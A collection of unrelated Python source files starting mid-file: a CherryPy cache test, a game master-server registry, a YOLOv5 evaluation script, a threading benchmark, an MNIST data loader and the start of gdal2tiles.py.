# for our thread/TCP overhead etc.
seconds=SECONDS + 2)
def test_cache_control(self):
self.getPage("/control")
self.assertBody('visit #1')
self.getPage("/control")
self.assertBody('visit #1')
self.getPage("/control", headers=[('Cache-Control', 'no-cache')])
self.assertBody('visit #2')
self.getPage("/control")
self.assertBody('visit #2')
self.getPage("/control", headers=[('Pragma', 'no-cache')])
self.assertBody('visit #3')
self.getPage("/control")
self.assertBody('visit #3')
time.sleep(1)
self.getPage("/control", headers=[('Cache-Control', 'max-age=0')])
self.assertBody('visit #4')
self.getPage("/control")
self.assertBody('visit #4')
|
OnlineSubsystemPythonServer.py
|
# Copyright (c) 2019 Ryan Post
# This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software.
# Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions:
# 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
import cherrypy
from cherrypy.lib import auth_digest
from cherrypy import response
import json
import jsonpickle
import time
from time import sleep
from threading import Thread
import requests
class Server(object):
def __init__(self):
self.registeredby = ''
self.name = ''
self.port = 0
self.map = ''
self.playercount = 0
self.maxplayers = 0
self.pwprotected = False
self.gamemode = ''
self.timeoflastheartbeat = 0
def __eq__(self, other):
if isinstance(other, self.__class__):
            return self.name == other.name and self.port == other.port
else:
return False
class MasterServer(object):
def __init__(self):
# Time between heartbeat in seconds, this is passed to the client and kept in sync.
self.time_between_heartbeats = 30
self.serverlist = []
thread = Thread(target = self.heartbeat)
thread.start()
def heartbeat(self):
while True:
            for server in list(self.serverlist):  # iterate over a copy so entries can be removed safely
delta = int(time.time()) - server.timeoflastheartbeat
if (delta > self.time_between_heartbeats):
self.serverlist.remove(server)
sleep(1)
@cherrypy.expose
def register_server(self, name, port, map, maxplayers, pwprotected, gamemode):
if self.server_exists(cherrypy.request.remote.ip, port):
self.internal_update_server(cherrypy.request.remote.ip, port, name, map, 0, maxplayers, pwprotected, gamemode)
            return json.dumps({'error' : False, 'message' : 'Successfully updated your server [%s %s:%s] on the server browser.' % (name, cherrypy.request.remote.ip, port)})
else:
server = Server()
            server.ip = cherrypy.request.remote.ip
            server.registeredby = cherrypy.request.remote.ip  # unregister_server() matches on this
server.name = name
server.port = port
server.map = map
server.maxplayers = maxplayers
server.pwprotected = pwprotected
server.gamemode = gamemode
server.timeoflastheartbeat = int(time.time())
try:
r = requests.get('http://' + cherrypy.request.remote.ip + ':' + port, timeout=2)
except requests.exceptions.ConnectTimeout:
# ports are not forwarded...
if (cherrypy.request.remote.ip != "127.0.0.1"):
return json.dumps({'error' : True, 'message' : 'Unable to connect to server [%s %s:%s]. Please verify your ports are forwarded and your firewall is not blocking the game. Your server will not be visible in the Server Browser.' % (server.name, server.ip, server.port)})
except requests.exceptions.ConnectionError:
pass
self.serverlist.append(server)
            return json.dumps({'error' : False, 'message' : 'Successfully added your server [%s %s:%s] to the server browser.' % (name, cherrypy.request.remote.ip, port), 'heartbeat' : self.time_between_heartbeats })
def internal_update_server(self, ip, port, name, map, playercount, maxplayers, pwprotected, gamemode):
for server in self.serverlist:
if server.ip == ip and server.port == port:
server.name = name
server.map = map
server.playercount = playercount
server.maxplayers = maxplayers
server.pwprotected = pwprotected
server.gamemode = gamemode
server.timeoflastheartbeat = int(time.time())
return True
return False
@cherrypy.expose
def update_server(self, port, name, map, playercount, maxplayers, pwprotected, gamemode):
if self.internal_update_server(cherrypy.request.remote.ip, port, name, map, playercount, maxplayers, pwprotected, gamemode):
            return json.dumps({'error' : False, 'message' : 'Successfully updated your server [%s %s:%s] on the server browser.' % (name, cherrypy.request.remote.ip, port)})
return json.dumps({'error' : True, 'message' : 'Server not registered'})
def server_exists(self, ip, port):
for server in self.serverlist:
if server.ip == ip and server.port == port:
return True
return False
@cherrypy.expose
def unregister_server(self, port):
for server in self.serverlist:
if (server.registeredby == cherrypy.request.remote.ip and server.port == port):
self.serverlist.remove(server)
@cherrypy.expose
def get_serverlist(self):
self.returnlist = []
for server in self.serverlist:
jsonstring = {'name' : server.name, 'port' : server.port, 'map' : server.map, 'playercount' : server.playercount, 'maxplayers' : server.maxplayers, 'pwprotected' : server.pwprotected, 'gamemode' : server.gamemode, 'ip' : server.ip }
self.returnlist.append(jsonstring)
return json.dumps({'error' : False, 'message' : '', 'servers' : self.returnlist})
@cherrypy.expose
def perform_heartbeat(self, port):
for server in self.serverlist:
if (server.ip == cherrypy.request.remote.ip and server.port == port):
server.timeoflastheartbeat = int(time.time())
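# Illustrative sketch, not part of the original module: how a game server process could talk
# to this master server over HTTP. The master URL, game port and example values below are
# assumptions, and the function is never called here.
def _example_game_server_client(master="http://127.0.0.1:8081", game_port="7777"):
    # Register once; a successful registration reply carries the heartbeat interval in seconds.
    reply = json.loads(requests.get(master + "/register_server", params={
        'name': 'My Server', 'port': game_port, 'map': 'TestMap',
        'maxplayers': 16, 'pwprotected': False, 'gamemode': 'FFA'}).text)
    interval = reply.get('heartbeat', 30)
    # Keep the entry alive; heartbeat() drops servers that miss the interval.
    while True:
        requests.get(master + "/perform_heartbeat", params={'port': game_port})
        sleep(interval)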
cherrypy.config.update({ 'server.socket_port': 8081,
'server.socket_host': '0.0.0.0',
"server.ssl_module": "pyopenssl",
'server.thread_pool' : 100
})
masterserver = MasterServer()
cherrypy.quickstart(masterserver)
|
test.py
|
# neuralmagic: no copyright
# flake8: noqa
# fmt: off
# isort: skip_file
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
log_imgs=0, # number of logged images
compute_loss=None,
half_precision=True):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' and half_precision # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = data.endswith('coco.yaml') # is COCO dataset
with open(data) as f:
data = yaml.load(f, Loader=yaml.SafeLoader) # model dict
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs, wandb = min(log_imgs, 100), None # ceil
try:
import wandb # Weights & Biases
except ImportError:
log_imgs = 0
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images
dataloader = create_dataloader(path, imgsz, batch_size, model.stride.max(), opt, pad=0.5, rect=True,
prefix=colorstr('test: ' if opt.task == 'test' else 'val: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
inf_out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
output = non_max_suppression(inf_out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(output):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if plots and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
val_batches = [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
wandb.log({"Images": wandb_images, "Validation": val_batches}, commit=False)
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
model.float() # for training
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help="'val', 'test', 'study'")
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ['val', 'test']: # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
)
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights:
test(opt.data, w, opt.batch_size, opt.img_size, 0.25, 0.45, save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = test(opt.data, w, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
|
crowded_calculate.py
|
import requests
import time
from threading import Thread
from multiprocessing import Process
import os,sys
_head = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'
}
url = "http://www.tieba.com"
def count(x, y):
    # make the program perform about 1.5 million calculations (CPU-bound busy work)
c = 0
while c < 500000:
c += 1
x += 1
y += 1
def write():
dir = os.path.dirname(os.path.realpath(__file__))
filepath = os.path.join(dir,'test.txt')
with open(filepath, 'w') as f:
for x in range(5000000):
f.write("testwrite\n")
def read():
dir = os.path.dirname(os.path.realpath(__file__))
filepath = os.path.join(dir, 'test.txt')
with open(filepath, 'r') as f:
        lines = f.readlines()  # read all lines back so this stays I/O-bound
def http_request():
try:
webpage = requests.get(url, headers = _head)
html = webpage.text
return {"context":html}
except Exception as e:
return {"error":e}
def io():
write()
read()
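# Expectation on CPython: the CPU-bound count() does not get faster with threads because the
# GIL lets only one thread execute Python bytecode at a time, whereas write()/read() and
# http_request() spend most of their time blocked in I/O with the GIL released, so threads
# do help there. Multiple processes sidestep the GIL at the cost of process start-up overhead.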
# single_Thread
def single_Thread_cpu():
t = time.time()
for x in range(10):
count(1,1)
print("single cpu", time.time()-t)
def single_Thread_io():
t = time.time()
for x in range(10):
write()
read()
print("single io", time.time()-t)
def single_Thread_http():
t = time.time()
for x in range(10):
http_request()
print("single http", time.time()-t)
# mul_Thread
def mul_Thread_cpu():
counts = []
t = time.time()
for x in range(10):
thread = Thread(target=count,args=(1,1))
counts.append(thread)
thread.start()
e = counts.__len__()
while True:
for th in counts:
if not th.is_alive():
e -= 1
if e <= 0:
break
print("mul cpu",time.time() - t)
def mul_Thread_io():
ios = []
t = time.time()
for x in range(10):
thread = Thread(target=io)
ios.append(thread)
thread.start()
e = ios.__len__()
while True:
for th in ios:
if not th.is_alive():
e -= 1
        if e <= 0:
break
print("mul io",time.time() - t)
def mul_Thread_http():
https = []
t = time.time()
for x in range(10):
thread = Thread(target=http_request)
https.append(thread)
thread.start()
e = https.__len__()
while True:
for th in https:
if not th.is_alive():
e -=1
if e <= 0:
break
print("mul http",time.time() - t)
# mul_process
def mul_process_cpu():
counts = []
t = time.time()
for x in range(10):
p = Process(target=count, args=(1, 1))
counts.append(p)
p.start()
e = counts.__len__()
while True:
for th in counts:
if not th.is_alive():
e -= 1
if e <= 0:
break
print("Multiprocess cpu", time.time() - t)
def mul_process_io():
t = time.time()
ios = []
t = time.time()
for x in range(10):
p = Process(target=io)
ios.append(p)
p.start()
e = ios.__len__()
while True:
for th in ios:
if not th.is_alive():
e -= 1
if e <= 0:
break
print("Multiprocess IO", time.time() - t)
def mul_process_http():
t = time.time()
httprs = []
t = time.time()
for x in range(10):
p = Process(target=http_request)
httprs.append(p)
p.start()
e = httprs.__len__()
while True:
for th in httprs:
if not th.is_alive():
e -= 1
if e <= 0:
break
print("Multiprocess Http Request", time.time() - t)
if __name__ == '__main__':
# single_Thread
single_Thread_cpu()
single_Thread_io()
single_Thread_http()
    # mul_Thread
mul_Thread_cpu()
mul_Thread_io()
mul_Thread_http()
# mul_process
mul_process_cpu()
mul_process_io()
mul_process_http()
print("__file__=%s" % __file__)
print("os.path.realpath(__file__)=%s" % os.path.realpath(__file__))
print("os.path.dirname(os.path.realpath(__file__))=%s" % os.path.dirname(os.path.realpath(__file__)))
print("os.path.split(os.path.realpath(__file__))=%s" % os.path.split(os.path.realpath(__file__))[0])
print("os.path.abspath(__file__)=%s" % os.path.abspath(__file__))
print("os.getcwd()=%s" % os.getcwd())
print("sys.path[0]=%s" % sys.path[0])
print("sys.argv[0]=%s" % sys.argv[0])
|
mnist.py
|
# Copyright 2019 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import multiprocessing as mp
import os
import tempfile
import pandas as pd
import tensorflow as tf
from PIL import Image
def write_images_serial(start_idx, end_idx, data, image_path, mode):
for i in range(start_idx, end_idx):
img = Image.fromarray(data[i])
img.save(os.path.join(image_path, "{}_{}.png".format(mode, i)))
def write_images_parallel(x, image_path, mode):
num_cpu = mp.cpu_count()
num_example = x.shape[0]
example_per_cpu = num_example // num_cpu
processes = []
for rank in range(num_cpu):
start_idx = rank * example_per_cpu
if rank == num_cpu - 1:
end_idx = num_example
else:
end_idx = start_idx + example_per_cpu
processes.append(mp.Process(target=write_images_serial, args=(start_idx, end_idx, x, image_path, mode)))
    # Start all workers first, then wait for them; starting and joining one at a time
    # would run the image writers sequentially instead of in parallel.
    for p in processes:
        p.start()
    for p in processes:
        p.join()
def write_csv(y, csv_path, mode):
x_names = []
y_names = []
num_example = len(y)
for idx in range(num_example):
x_names.append(os.path.join("image", "{}_{}.png".format(mode, idx)))
y_names.append(y[idx])
df = pd.DataFrame(data={'x': x_names, 'y': y_names})
df.to_csv(csv_path, index=False)
def load_data(path=None):
if path is None:
path = os.path.join(tempfile.gettempdir(), ".fe", "Mnist")
if not os.path.exists(path):
os.makedirs(path)
image_path = os.path.join(path, "image")
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
train_csv_path = os.path.join(path, "train.csv")
eval_csv_path = os.path.join(path, "eval.csv")
if not os.path.exists(image_path):
print("writing image data to {}".format(image_path))
os.makedirs(image_path)
write_images_parallel(x_train, image_path, "train")
write_images_parallel(x_test, image_path, "eval")
if not os.path.exists(train_csv_path):
write_csv(y_train, train_csv_path, "train")
if not os.path.exists(eval_csv_path):
write_csv(y_test, eval_csv_path, "eval")
return train_csv_path, eval_csv_path, path
|
gdal2tiles.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ******************************************************************************
# $Id$
#
# Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/)
# Support: BRGM (http://www.brgm.fr)
# Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory.
# - generate Google Earth metadata (KML SuperOverlay)
# - generate simple HTML viewer based on Google Maps and OpenLayers
# - support of global tiles (Spherical Mercator) for compatibility
# with interactive web maps a la Google Maps
# Author: Klokan Petr Pridal, klokan at klokan dot cz
# Web: http://www.klokan.cz/projects/gdal2tiles/
# GUI: http://www.maptiler.org/
#
###############################################################################
# Copyright (c) 2008, Klokan Petr Pridal
# Copyright (c) 2010-2013, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# ******************************************************************************
from __future__ import print_function, division
import math
from multiprocessing import Pipe, Pool, Process, Manager
import os
import tempfile
import threading
import shutil
import sys
from uuid import uuid4
from xml.etree import ElementTree
from osgeo import gdal
from osgeo import osr
try:
from PIL import Image
import numpy
import osgeo.gdal_array as gdalarray
numpy_available = True
except ImportError:
# 'antialias' resampling is not available
numpy_available = False
__version__ = "$Id$"
resampling_list = ('average', 'near', 'bilinear', 'cubic', 'cubicspline', 'lanczos', 'antialias')
profile_list = ('mercator', 'geodetic', 'raster')
webviewer_list = ('all', 'google', 'openlayers', 'leaflet', 'none')
threadLocal = threading.local()
# =============================================================================
# =============================================================================
# =============================================================================
__doc__globalmaptiles = """
globalmaptiles.py
Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================
Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:
- GlobalMercator (based on EPSG:3857)
for Google Maps, Yahoo Maps, Bing Maps compatible tiles
- GlobalGeodetic (based on EPSG:4326)
for OpenLayers Base Map and Google Earth compatible tiles
More info at:
http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates
Created by Klokan Petr Pridal on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.
In case you use this class in your product, translate it to another language
or find it useful for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.
Class is available under the open-source GDAL license (www.gdal.org).
"""
MAXZOOMLEVEL = 32
class GlobalMercator(object):
r"""
TMS Global Mercator Profile
---------------------------
Functions necessary for generation of tiles in Spherical Mercator projection,
EPSG:3857.
Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps,
UK Ordnance Survey OpenSpace API, ...
and you can overlay them on top of base maps of those web mapping applications.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Mercator tiles::
LatLon <-> Meters <-> Pixels <-> Tile
WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid
lat/lon XY in meters XY pixels Z zoom XYZ from TMS
    EPSG:4326           EPSG:3857
.----. --------- -- TMS
/ \ <-> | | <-> /----/ <-> Google
\ / | | /--------/ QuadTree
----- --------- /------------/
KML, public WebMapService Web Clients TileMapService
What is the coordinate extent of Earth in EPSG:3857?
[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]
Constant 20037508.342789244 comes from the circumference of the Earth in meters,
    which is roughly 40 thousand kilometers; the coordinate origin is in the middle of the extent.
In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0
$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:3857
    Polar areas with abs(latitude) bigger than 85.05112878 are clipped off.
What are zoom level constants (pixels/meter) for pyramid with EPSG:3857?
whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,
every lower zoom level resolution is always divided by two
initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062
What is the difference between TMS and Google Maps/QuadTree tile name convention?
The tile raster itself is the same (equal extent, projection, pixel size),
there is just different identification of the same raster tile.
Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.
Google placed the origin [0,0] to the top-left corner, reference is XYZ.
Microsoft is referencing tiles by a QuadTree name, defined on the website:
http://msdn2.microsoft.com/en-us/library/bb259689.aspx
The lat/lon coordinates are using WGS84 datum, yes?
Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.
Well, the web clients like Google Maps are projecting those coordinates by
Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if
    they were on the WGS84 ellipsoid.
From MSDN documentation:
To simplify the calculations, we use the spherical form of projection, not
the ellipsoidal form. Since the projection is used only for map display,
and not for displaying numeric coordinates, we don't need the extra precision
of an ellipsoidal projection. The spherical projection causes approximately
0.33 percent scale distortion in the Y direction, which is not visually
noticeable.
How do I create a raster in EPSG:3857 and convert coordinates with PROJ.4?
You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.
    All of these tools support -t_srs 'epsg:3857'.
For other GIS programs check the exact definition of the projection:
